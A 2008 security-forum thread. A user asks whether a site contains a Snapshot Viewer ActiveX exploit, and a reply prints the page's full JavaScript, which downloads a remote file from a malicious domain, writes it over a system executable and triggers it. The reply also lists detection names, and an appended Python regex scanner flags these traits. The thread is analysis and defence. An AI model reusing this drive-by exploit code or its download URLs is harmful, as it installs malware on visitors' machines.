Author Topic: [Question] Is this exploit code?

July 30, 2008, 02:47:43 am

pcaccent

While I analyzed some website, I noticed suspicious Snapshot Viewer ActiveX Control Vulnerability exploit code.
I am not sure whether it is exploit code or not.

See this page.
Quote
hxxp://jzm015.cn/ss.html


July 30, 2008, 06:30:18 am
Reply #1

MysteryFCM

Code:
*****************************************************************
vURL Desktop Edition v0.3.2 Results
Source code for: http://jzm015.cn/ss.html
Server IP: 58.53.128.61 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 30 July 2008
Time: 07:24:14:24
*****************************************************************
<script>
function GetRoot()
{
for (index = 2, root = ""; index <= 26; index++)
{
root = String.fromCharCode(65 + index);
var outlook = new Image();
outlook.src = "res://" + root +":\\Program Files\\Outlook Express\\msoeres.dll/#2/1";
if (outlook.height == 59)
{
break;
}
outlook = '';
}
return root;
}

function Exploit(url)
{
var root = GetRoot();
// Not Find
if (root == '[')
return;
try
{
var obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
}catch(e)
{
if (obj != "[object]")
return;
}

obj.SnapshotPath = url;
try
{
obj.CompressedPath = root +":\\Program Files\\Outlook Express\\wab.exe";
obj.PrintSnapshot();
}catch(e){};

var iv = setInterval(function(){
if (obj.readyState == 4) {
clearInterval(iv);
window.location = "ldap://";
}
}, 3000)
}

Exploit("http://down.hs7yue.cn/down/ko.css");
</script>

TR/ATRAPS.Gen (AntiVir): down.hs7yue.cn/down/ko.css

Also available: TR/Dldr.Small.xxg;

down.hs7yue.cn/down/ko.exe
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
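
A static triage check for the question asked in this thread, as an added example that is not part of either post and is not vURL's own logic: it scans page source for the traits visible in the dump above (the Snapshot Viewer ProgID, a `CompressedPath` that points at an executable, a `PrintSnapshot()` call, plus the `res://` probe and `ldap://` redirect). The regexes, verdict labels and sample strings are assumptions constructed for this example.

```python
import re

# Traits taken from the script in the dump above; the regexes are this example's own.
INDICATORS = {
    "progid": re.compile(
        r"ActiveXObject\(\s*[\"']snpvw\.Snapshot Viewer Control\.1[\"']", re.I),
    "snapshot_path_set": re.compile(r"\.SnapshotPath\s*=", re.I),
    # CompressedPath is the local write target; an executable extension is the red flag.
    "exe_write_target": re.compile(
        r"\.CompressedPath\s*=[^;]*\.(?:exe|dll|scr|bat|cmd|hta)\b", re.I),
    "print_snapshot_call": re.compile(r"\.PrintSnapshot\s*\(", re.I),
    "res_probe": re.compile(r"[\"']res://", re.I),
    "ldap_redirect": re.compile(r"location\s*=\s*[\"']ldap://", re.I),
}
CORE = {"progid", "exe_write_target", "print_snapshot_call"}

def scan(source):
    """Return (verdict, sorted matched indicator names) for a page's source text."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    if CORE.issubset(hits):
        verdict = "likely-exploit"   # control is told to write an executable locally
    elif "progid" in hits:
        verdict = "suspicious"       # control is scripted, but no executable target seen
    else:
        verdict = "clean"
    return verdict, hits

# Constructed sample: same property sequence as the dump, with a placeholder URL.
SAMPLE_FLAGGED = r'''<script>
var obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
obj.SnapshotPath = "http://payload.example.invalid/x.css";
obj.CompressedPath = "C:\\Program Files\\Outlook Express\\wab.exe";
obj.PrintSnapshot();
window.location = "ldap://";
</script>'''

# Constructed sample: the control only displays a report snapshot.
SAMPLE_VIEWER = r'''<script>
var v = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
v.SnapshotPath = "http://intranet.example.invalid/report.snp";
</script>'''

if __name__ == "__main__":
    for label, src in (("flagged", SAMPLE_FLAGGED), ("viewer", SAMPLE_VIEWER)):
        print(label, scan(src))
```

A match on the core set is a reason to pull the referenced download for AV scanning, as the reply above does; it is a pattern match on source text and will miss obfuscated variants.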